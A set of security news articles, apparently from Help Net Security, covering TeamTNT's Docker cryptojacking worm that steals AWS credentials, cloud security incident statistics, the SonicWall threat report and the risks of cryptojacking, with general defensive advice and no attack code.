Updated cryptojacking worm steals AWS credentials

A malicious cryptocurrency miner and DDoS worm that has been targeting Docker systems for months now also steals Amazon Web Services (AWS) credentials.

What’s more, TeamTNT – the attackers wielding it – have also begun targeting Kubernetes clusters and Jenkins servers.

The original threat

TeamTNT’s “calling card” appears when the worm first runs on the target installation:

worm steals AWS credentials

First spotted by MalwareHunterTeam and Trend Micro researchers in May 2020, the original worm would:

  • Scan for open Docker daemon ports (i.e., misconfigured Docker containers)
  • Create an Alpine Linux container to host the coinminer and DDoS bot
  • Search for and delete other coin miners and malware
  • Configure the firewall to allow ports that will be used by the other components, sinkhole other domain names, exfiltrate sensitive information from the host machine
  • Download additional utilities, a log cleaner, and a tool that attackers may use to pivot to other devices in the network (via SSH)
  • Download and install the coinminer
  • Collect system information and send it to the C&C server

New capabilities

The latest iteration has been equipped with new capabilities, Cado Security researchers found.

The worm still scans for open Docker APIs, then spins up Docker images and install itself in a new container, but it now also searches for exploitable Kubernetes systems and files containing AWS credentials and configuration details – just in case the compromised systems run on the AWS infrastructure.

The code to steal these files is relatively straightforward, the researchers note, and they expect other worms to copy this new ability soon.

But are the attackers using the stolen credentials or are they selling them? The researchers tried to find out by sending “canary” AWS keys to TeamTNT’s servers, but they haven’t been used yet.

“This indicates that TeamTNT either manually assess and use the credentials, or any automation they may have created isn’t currently functioning,” they concluded.

Nevertheless, they urge businesses to:

  • Identify systems that are storing AWS credential files and delete them if they aren’t needed
  • Use firewall rules to limit any access to Docker APIs
  • Review network traffic for connections to mining pools or using the Stratum mining protocol
  • Review any connections sending the AWS Credentials file over HTTP

70% of organizations experienced a public cloud security incident in the last year

70% of organizations experienced a public cloud security incident in the last year – including ransomware and other malware (50%), exposed data (29%), compromised accounts (25%), and cryptojacking (17%), according to Sophos.

public cloud security incident

Organizations running multi-cloud environments are greater than 50% more likely to suffer a cloud security incident than those running a single cloud.

Europeans suffered the lowest percentage of security incidents in the cloud, an indicator that compliance with GDPR guidelines are helping to protect organizations from being compromised. India, on the other hand, fared the worst, with 93% of organizations being hit by an attack in the last year.

“Ransomware, not surprisingly, is one of the most widely reported cybercrimes in the public cloud. The most successful ransomware attacks include data in the public cloud, according to the State of Ransomware 2020 report, and attackers are shifting their methods to target cloud environments that cripple necessary infrastructure and increase the likelihood of payment,” said Chester Wisniewski, principal research scientist, Sophos.

“The recent increase in remote working provides extra motivation to disable cloud infrastructure that is being relied on more than ever, so it’s worrisome that many organizations still don’t understand their responsibility in securing cloud data and workloads. Cloud security is a shared responsibility, and organizations need to carefully manage and monitor cloud environments in order to stay one step ahead of determined attackers.”

The unintentional open door: How attackers break in

Accidental exposure continues to plague organizations, with misconfigurations exploited in 66% of reported attacks. Misconfigurations drive the majority of incidents and are all too common given cloud management complexities.

Additionally, 33% of organizations report that cybercriminals gained access through stolen cloud provider account credentials. Despite this, only a quarter of organizations say managing access to cloud accounts is a top area of concern.

Data further reveals that 91% of accounts have overprivileged identity and access management roles, and 98% have multi-factor authentication disabled on their cloud provider accounts.

public cloud security incident

Public cloud security incident: The silver lining

96% of respondents admit to concern about their current level of cloud security, an encouraging sign that it’s top of mind and important.

Appropriately, “data leaks” top the list of security concerns for nearly half of respondents (44%); identifying and responding to security incidents is a close second (41%). Notwithstanding this silver lining, only one in four respondents view lack of staff expertise as a top concern.

Malware and ransomware attack volume down due to more targeted attacks

Cybercriminals are leveraging more evasive methods to target businesses and consumers, a SonicWall report reveals.

ransomware attack volume down

“Cybercriminals are honing their ability to design, author and deploy stealth-like attacks with increasing precision, while growing their capabilities to evade detection by sandbox technology,” said SonicWall President and CEO Bill Conner.

“Now more than ever, it’s imperative that organizations detect and respond quickly, or run the risk of having to negotiate what’s being held at ransom from criminals so embolden they’re now negotiating the terms.”

The 2020 SonicWall Cyber Threat Report is the result of threat intelligence collected over the course of 2019 by over 1.1 million sensors placed in over 215 countries and territories.

Cybercriminals change approach to malware

Spray-and-pray tactics that once had malware attack numbers soaring have since been abandoned for more targeted and evasive methods aimed at weaker victims. SonicWall recorded 9.9 billion malware attacks, a slight 6% year-over-year decrease.

Targeted ransomware attacks cripple victims

While total ransomware volume (187.9 million) dipped 9% for the year, highly targeted attacks left many state, provincial and local governments paralyzed and took down email communications, websites, telephone lines and even dispatch services.

The IoT is a treasure trove for cybercriminals

Bad actors continue to deploy ransomware on ordinary devices, such as smart TVs, electric scooters and smart speakers, to daily necessities like toothbrushes, refrigerators and doorbells.

Researchers discovered a moderate 5% increase in IoT malware, with a total volume of 34.3 million attacks in 2019.

Cryptojacking continues to crumble

The volatile shifts and swings of the cryptocurrency market had a direct impact on threat actors’ interest to author cryptojacking malware. The dissolution of Coinhive in March 2019 played a major role in the threat vector’s decline, plunging the volume of cryptojacking hits to 78% in the second half of the year.

Fileless malware targets Microsoft Office/Office 365, PDF documents

Cybercriminals used new code obfuscation, sandbox detection and bypass techniques, resulting in a multitude of variants and the development of newer and more sophisticated exploit kits using fileless attacks instead of traditional payloads to a disk.

While malware decreased 6% globally, most new threats masked their exploits within today’s most trusted files. In fact, Office (20.3%) and PDFs (17.4%) represent 38% of new threats detected by Capture ATP.

Encrypted threats are still everywhere

Cybercriminals have become reliant upon encrypted threats that evade traditional security control standards, such as firewall appliances that do not have the capability or processing power to detect, inspect and mitigate attacks sent via HTTPs traffic.

Researchers recorded 3.7 million malware attacks sent over TLS/SSL traffic, a 27% year-over-year increase that is trending up and expected to climb through the year.

ransomware attack volume down

Side-channel attacks are evolving

These vulnerabilities could impact unpatched devices in the future, including everything from security appliances to end-user laptops. Threat actors could potentially issue digital signatures to bypass authentication or digitally sign malicious software.

The recent introduction of TPM-FAIL, the next variation of Meltdown/Spectre, Foreshadow, PortSmash, MDS and more, signals criminals’ intent to weaponize this method of attack.

Attacks over non-standard ports cannot be ignored

This year’s research indicated that more than 19% of malware attacks leveraged non-standard ports, but found the volume dropping to 15% by year’s end with a total of 64 million detected threats. This type of tactic is utilized to deliver payloads undetected against targeted businesses.

“The application layer is the biggest target right now. The average commercial web application, like the one that we all use for our shopping or banking, has 26.7 vulnerabilities. That’s a shocking number. Imagine if your airline averaged 26.7 safety problems! Fortunately, it is now possible to give software a sort of digital immune system. Web applications and APIs can be provided with defences that enable them to identify their own vulnerabilities and prevent them from being exploited. Once teams see exactly where they are weak and how attackers are targeting them, they can quickly clean up their house. Ensuring that they (and those using their software) are protected,” Jeff Williams, at Contrast Security, told Help Net Security.

The hidden risks of cryptojacking attacks

For any business, privacy and security are a constant concern. The variety and velocity of attacks seeking to infiltrate corporate systems and steal vital business and customer information seem never-ending. Given the very public repercussions of certain types of breaches, it can be easy for executives and IT professionals to focus attention on only the most notable attacks. However, numerous industry studies have found that a quiet threat, known as cryptojacking, is rising faster than any other type of cyber incident.

Cryptojacking is a breach where malware is installed on a device connected to the internet (anything from a phone, to a gaming console, to an organization’s servers). Once installed, the malware uses the hijacked computing power to “mine” cryptocurrency without the user’s knowledge.

Unlike phishing or ransomware attacks, cryptojacking runs nearly silently in the background of the victim’s device, and as a result the increase in cryptojacking attacks has flown mainly under the radar. Yet, new studies suggest that attacks of this type have more than tripled since 2017, generating concern as these undetected breaches siphon energy, slow down performance of systems and expose victims to additional risk.

The rise of cryptojacking has followed the same upward trajectory as the value of cryptocurrency. Suddenly, digital “cash” is worth actual money and hackers, who usually have to take several steps to generate income from stolen data, have a direct path to cashing in on their exploits. But if all the malware does is sit quietly in the background generating cryptocurrency, is it really much of a danger? In short, yes – for two reasons.

In fundamental terms, cryptojacking attacks are about stealing… in this case energy and system resources. The energy might be minimal (more about that in a moment) but using resources slows the performance of the overall system and actually increases wear and tear on the hardware, reducing its lifespan, resulting in frustration, inefficiency and increased costs.

Much more importantly however, a cryptojacking-compromised system is a flashing warning sign that a vulnerability exists. Often, infiltrating a system to cryptojack involves opening access points that can be easily leveraged to steal other types of data. Cryptojacking not only appropriates valuable computer and energy resources, but also exposes victims to much more blatant and damaging data attacks.

Who is at risk?

Any connected device can be utilized to mine cryptocurrency, however, the goal of most cryptojacking operations is to hijack enough devices so that their processing power can be pooled, creating a much more effective network with which to generate income. This strategy relies on utilizing small amounts of power from several different machines, which also lessens the chances that the victim will realize they’ve been hacked because the power stolen is miniscule enough to be ignored.

Once hacked, the attacker will network these devices together to create large cryptojacking networks. These attacks are thus often focused on large corporations or businesses where access to multiple devices is easy and convenient.

Identifying victims

Identifying and flagging cryptojacked devices can be difficult, requiring dedicated time and energy. In many cases, the malware might reside in compromised versions of legitimate software. As a result, security scans are less likely to flag the downloaded application as a threat.

The first clue that something may be amiss at the organization is the sudden slowing of devices or a rise in cross-company complaints about computer performance. If widespread, administrators should look to potential cryptojacking as the possible culprit.

Protecting the pack

Organizations and individuals looking to protect themselves need to ensure their overall privacy and security posture is high and that they are taking every step to defend themselves against all types of cyber incidents. Crytopjacking is often a warning shot, sending up a red flag that the system may not be as protected as it should be.

Relying on the basics is the first place to start – everyone on the network should be using multi-factor authentication and unique passwords. There should be continuous monitoring for unexpected activity on the network, as well as safeguards in place to make sure any software installed on a device comes from a reputable source and is fully patched. Finally, there needs to be a team dedicated to constantly monitoring, remediating and updating privacy and security safeguards.

While cryptojacking attacks are worrisome and can lead to further breaches, most can be avoided or remedied before a larger incident occurs with proper monitoring and early detection. The rise in cryptojacking should be taken as a good reminder for administrators to ensure their security and privacy measures adhere to the current standards.

After all, if there weren’t a lot of vulnerable systems out there this type of attack wouldn’t be growing at a rapid pace. As always, staying vigilant, up-to-date and following security best practices is the only way to stay shielded against cryptojacking cybercriminals.

Attack tools and techniques used by major ransomware families

Ransomware tries to slip unnoticed past security controls by abusing trusted and legitimate processes, and then harnesses internal systems to encrypt the maximum number of files and disable backup and recovery processes before an IT security team catches up, according to a new Sophos report. Main modes of distribution for the major ransomware families Ransomware is typically distributed in one of three ways: as a cryptoworm, which replicates itself rapidly to other computers for maximum … More

The post Attack tools and techniques used by major ransomware families appeared first on Help Net Security.